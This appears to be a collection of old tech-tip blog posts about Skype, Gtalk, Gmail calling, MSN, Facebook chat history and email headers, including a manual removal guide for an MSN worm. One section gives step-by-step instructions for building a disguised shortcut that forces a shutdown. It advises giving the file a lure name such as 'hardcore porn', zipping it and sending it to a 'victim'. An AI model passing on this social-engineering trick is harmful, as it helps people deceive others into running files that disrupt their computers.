Trick To Run Multiple Skype Accounts On A Single Computer

If you have heard about multi-yahoo and multi-msn but haven’t heard about using multiple Skype accounts on a single computer than know this that Skype has given this facility. This is a great trick because sometimes you need to use more than one accounts on a single computer for multiple communications at the same time. This is valid for 4.0 version and later.

Follow these steps:
  1. Click Start > Run (or press the Windows and R keys on your keyboard at the same time)
  2. In the Run window, enter the following command (include the quotes) and press OK
  3. "C:Program FilesSkypePhoneSkype.exe" /secondary

If you get any error messages, please copy and paste the exact command from this post and try again. You may can get this error if you have changed the installation directory at the installation time.

Alternative Solution:
  1. Find the Skype executable file (Skype.exe) in: C:Program FilesSkypePhone
  2. Right click on it and choose: Send to > Desktop (create shortcut)
  3. Locate the shortcut on the desktop, then right-click on it and choose Properties
  4. In the Target field, add: /secondary. The Target field should now be: "C:Program FilesSkypePhoneSkype.exe" /secondary
  5. Click OK. You can now start a new instance of Skype every time you double-click on the new shortcut.

The above solution will make a second instance for future use, you won’t be given the first method’s command every time on RUN menu to open the second instance. You just double click the secondary instance from your desktop and it will up for you.

To make it more convenient and easy, you can put this shortcut in windows32 directory under window directory and use it a global short, for that copy this shortcut in windows32 directory. Enter the name of the shortcut in RUN menu and it will work.

Google's Gmail PC-to-Phone Call Service

The Google Voice project has gone a long way from just simple voice call recording. Skype geeks must be trembling already because the Gmail Voice Call feature, Gmail’s PC-to-Phone calling, is doing well. Google’s Gmail new feature that lets you do voice calls to landline and mobile numbers right from your e-mail account is pure genius. No need to download and install a separate application like you do with Skype and other VOIP services. Gmail is not yet as popular as Hotmail or Yahoo Mail but with the introduction of this PC-to-Phone calling feature, it might just double its subscribers within the year.Skype should feel very threatened, while it enjoys more than 500 millions users now.

The new PC-to-phone feature is integrated into the chat list on the Gmail page. Making a call is actually very similar to starting a regular chat or video sessions. Once a user has clicked on the “Call phone” button on the top of the friends list, a telephone key pad appears—after that, a user can dial the number (by clicking on the numbers with a mouse, copying or typing a phone number) and start a conversation.

And what about the prices? Calls to the USA and Canada will be free, and to make a call to some other country, users are asked to pay strikingly little money—for instance, a voice conversation with a friend in Australia, France, Germany or the UK and more will cost only $0.02 per minute (the full list of rates can be found here).

Gtalk : Hidden Formatting Codes

I have been using Gtalk from quite a few years and it was just today when i discovered a feature of Gtalk to format the text in there.
There are 3 formatting options for Gtalk that may be used in Gtalk Messenger :

  • Bold Text

  • Italics Text

  • Strikethrough Text
Making Bold Text
Write any text in Gtalk and put * before and after the text and it would be written in Bold text.

Making Italics Text
Write any text in Gtalk and put _ (Underscore) before and after the text and it would be written in Italics.

Making Strikethrough Text
Similarly use – (Hyphen) befor and after the text to get a strike through text effect.

This is very similar to the way you write “: )” which turns to a Smiley for Smile. Although the conversion delay is around a second for this when you type it in text box and when you get the result in the Chat Window.

“Hi, this is your photo ?” - Remove This MSN/Windows Live Messenger Virus

Internet is a place which is flooded with security problems and viruses and you need to stay alert of any suspicious links or messages in the inbox or instant messenger.

There has been a virus which is spreading through MSN / Live messenger which shows you a link in the IM window with a text which says

“Hi,this is your photo? – Some link here.

Do not click on the link on this message, this takes you to a url which infects your computer with this virus. It downloads a virus file called Picture_2525.exe and installs it.

If you have accidentally clicked this link, below is the method to remove this virus manually.

How To Fix The Problem?:
I recommend that you always use a good antivirus tool, free or paid, with real-time protection which can save you from such viruses.

If this virus has already infected your computer, follow following procedure:

1. Open Windows Task Manager (press Ctrl+Shift+Esc simultaneously), go to the Processes tab and right click at the processes below and select End Process:

svlost.exe
svlostSrv.exe
tasman.exe

2. Then simultanously press Win+R to bring up the Run window and type the following command.

sc delete svlostServices

3. Delete the files listed below in Windows\System32 folder.

libeay32.dll
ssleay32.dll
svlost.exe
svlosta.dll
svlostb.dll
svlostSrv.exe
tasman.exe

4. Again simultanously press WIN+R to bring up Run window and type the two commands below. Type once, hit enter and then continue to the second one.

reg delete "hkcu\software\microsoft\internet explorer\main" /v default_page_url /f
reg delete "hkcu\software\microsoft\internet explorer\main" /v "Start Page" /f

The virus has been completely removed from your computer. However, I’d still advice you to change your MSN password just to be on the safe side.

How to Save Facebook Chat History?

Facebook Chat History on Facebook.com is only temporary. Indeed, Facebook Chat history can be easily removed by pressing “clear chat history” or by exiting the Facebook chat popup window.

There are, however, two solutions that make it possible for your Facebook Chat history to be automatically or manually saved. You can use a Facebook Messenger such as Chit Chat for Facebook or a browser add-on like Facebook Chat History Manager to save your Facebook Chat History.

With a Facebook Messenger, Facebook Chat history can be both automatically and manually saved.

By automatically saving Facebook Chat history you can ensure that you don’t forget to save a conversation that you want. Moreover, Facebook Chat Messengers will time and date stamp your conversations. Additionally, the Facebook Chat history will be saved on your computer as opposed to on Facebook.

Chit Chat for Facebook:
Chit Chat for Facebook is a Facebook Instant Messenger that enables you to use Facebook Chat from your desktop.

The image below provides an indication how the Facebook Chat History stored by Chit Chat for Facebook.

With regard to Facebook Chat History, Chit Chat for Facebook makes it possible to automatically save all instant messages sent and received on Facebook Chat. Usefully, Chit Chat also provides a date and time stamp in its chat logs. Uniquely, Chit Chat for Facebook not only saves the formatting of messages (bold and italic) it also saves the emoticons used.

Facebook Chat History of a particular conversation can also be manually saved by clicking on “save conversation.”

Facebook Chat History Browser add-on:
If you’re a Firefox user, then there is a Facebook Chat History browser add-on suitably named Facebook Chat History Manager . Whilst it’s an experimental build, it did work fine for me. I especially like the way in which it indexes your conversations by person and by time period in a central location. However, I found that to get it working it is much more technical and complicated than using a Facebook Messenger.

I also found it annoying that it uses the current tab window rather than opening a new one – so if you are on Facebook Chat in Firefox and then go to view your Facebook Chat history this application effectively logs you out.

For example, you need to identify Facebook’s ten digit ID number for your Facebook profile page.

Make Free STD-ISD calls using Skype

We can see so many tips and tricks on Internet which says make free calls or cheap STD-ISD calls and most of them don’t even work. Here is one trick which I tried and worked for me. I’m sure this will work for you.

Though before sharing this trick, most of free voice call features works on advertisement. They provide you free calling feature because they run advertisement before the call. This is the same in the case of free SMS.

To make this free calls we are going to use Skype (I mostly use Skype Messenger). Open Skype and key in this number

1-800-3733-411 (1-800-free-411)

Since its a 800 number you will not be charged anything. You will be welcomed with an automated voice message. Upon asking, for various voice response say free call.

After That dial your desired phone number. This free call will last for 5 minutes only but you can again redial the number by restarting the process.

I’m sure by using this you can save lots of your bills on your phone calls. Do share any other trick you know to save bills on phone calls.

If u don't have skype installed you can download it from Internet. Ok! I am providing u the link here. It's all free stuff.

Download Skype.

How to Shut d0wn any one computer using msn chat!

Ok this is a........ Well it's not really a virus of a hack because it doesn't damage anything. But that aside what it will do is shutdown the victim’s computer, this can be put in MSN convos so it is VERY fun to have, and it can also be put in emails and such like things.

1) Right click on desk top, and then go New, then Shortcut.

2) Then in the "type location of the item" you want to type:
%windir%\system32\shutdown.exe -s -t 120 -c "This is a virus"

You can change "this is a virus" to anything you would like that’s just the message that will appear.

The 120 you typed in can also be change at will, this is simply the amount of time they receive in till there computer will shutdown.

Once the code has been entered as you have seen above click next.

My advice would be to rename it something like.... wicked game, hardcore porn. Depends on the victim’s age and sex. But make sure you call it something good or the victim won't bother clicking on it.

After you have given it a name click on finish.

You should now have an icon on your desktop that is called "wicked game" or whatever name you gave it.

It is also advised you change the icon to something different.

3) Change name and icon.

4) Now to send it to some one you need to make a compressed file.
This can be done by right clicking on the desktop, New, Compressed file (zipped)
Then another folder should appear on your desktop click on this and drag your shutdown virus into the zipped folder.

5) Once your shutdown virus is in your compressed folder rename it.
Make sure to give it a similar name as to the file inside it like "Great Game.zip"
Don’t forget to add the .zip at the end.

WARNING! Make sure when you rename the compressed folder to add .zip at the end it is very important.

Now feel free to send it to anyone you...... dislike greatly.

As a safe guard I will tell you how to stop the shutdown count down. Just encase you ever click it your self LOL.

Ok go to start, run, type cmd, then in cmd type: shutdown -a

How to find the IP address of sender in Yahoo, Get the proper IP Address

When you receive an email, you receive more than just the message. The email comes with headers that carry important information that can tell where the email was sent from and possibly who sent it. For that, you would need to find the IP address of the sender. The tutorial below can help you find the IP address of the sender. Note that this will not work if the sender uses anonymous proxy servers.

Finding IP address in Yahoo! Mail

1.) Log into your Yahoo! mail with your username and password.
2.) Click on Inbox or whichever folder you have stored your mail.
3.) Open the mail.
4.) If you do not see the headers above the mail message, your headers are not displayed.

To display the headers,* Click on Options on the top-right corner* In the Mail Options page, click on General Preferences* Scroll down to Messages where you have the Headers option* Make sure that Show all headers on incoming messages is selected* Click on the Save button* Go back to the mails and open that mail.

5.) You should see similar headers like this:Yahoo! headers : nameLook for Received: from followed by the IP address between square brackets [ ]. Here, it is 202.65.138.109.That is be the IP address of the sender!
6.) Track the IP address of the sender.
